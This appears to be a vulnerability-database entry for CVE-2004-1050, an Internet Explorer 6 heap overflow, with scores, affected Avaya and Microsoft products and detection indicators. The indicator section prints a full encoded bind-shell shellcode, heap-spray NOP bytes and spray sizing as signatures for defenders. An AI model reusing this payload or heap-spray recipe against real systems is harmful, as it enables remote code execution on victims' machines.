cbcvebase.
CVE-2004-1050
published 2004-12-31

CVE-2004-1050: Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME, FRAME…

PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
67.06%
99.2th percentile
Heap-based buffer overflow in Internet Explorer 6 allows remote attackers to execute arbitrary code via long (1) SRC or (2) NAME attributes in IFRAME, FRAME, and EMBED elements, as originally discovered using the mangleme utility, aka "the IFRAME vulnerability" or the "HTML Elements Vulnerability."

Affected

24 ranges
VendorProductVersion rangeFixed in
avayadefinity_one_media_server
avayadefinity_one_media_server
avayadefinity_one_media_server
avayadefinity_one_media_server
avayadefinity_one_media_server
avayadefinity_one_media_server
avayadefinity_one_media_server
avayaip600_media_servers
avayaip600_media_servers
avayaip600_media_servers
avayaip600_media_servers
avayaip600_media_servers
avayaip600_media_servers
avayaip600_media_servers
avayamodular_messaging_message_storage_server
avayas8100
avayas8100
avayas8100
avayas8100
avayas8100
avayas8100
avayas8100
microsoftie
microsoftinternet_explorer

Detection & IOCsextracted from sources · hover to see the quote

port28876
bytes
%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb
bytes
%u0D0D%u0D0D
  • Exploit targets heap-based buffer overflow via long SRC or NAME attributes in IFRAME, FRAME, or EMBED HTML elements in Internet Explorer 6; detect anomalously long attribute values in these tags in HTTP responses.
  • Exploit uses JavaScript heap spray with NOP sled bytes 0x0D0D0D0D; detect repeated 0x0D0D sequences in script content of HTML pages served to IE6 clients.
  • Exploit drops a bind shell on TCP port 28876; monitor for unexpected listening services or outbound connections on this port following IE6 browsing activity.
  • Shellcode begins with marker bytes 0x43 0x43 0x43 0x43 (ASCII 'CCCC') followed by a short JMP; use this as a byte-level signature to detect the payload in network traffic or memory.
  • ·The PoC shellcode is a looping bind shell; the port (28876) is hardcoded in the shellcode itself and would need to be changed by an attacker reusing this payload — detections keyed solely on port 28876 may miss modified variants.
  • ·Heap spray block size is 0x40000 dwords; heap-spray detections should account for this specific allocation size when tuning memory-based heuristics for this exploit.

CVSS provenance

nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.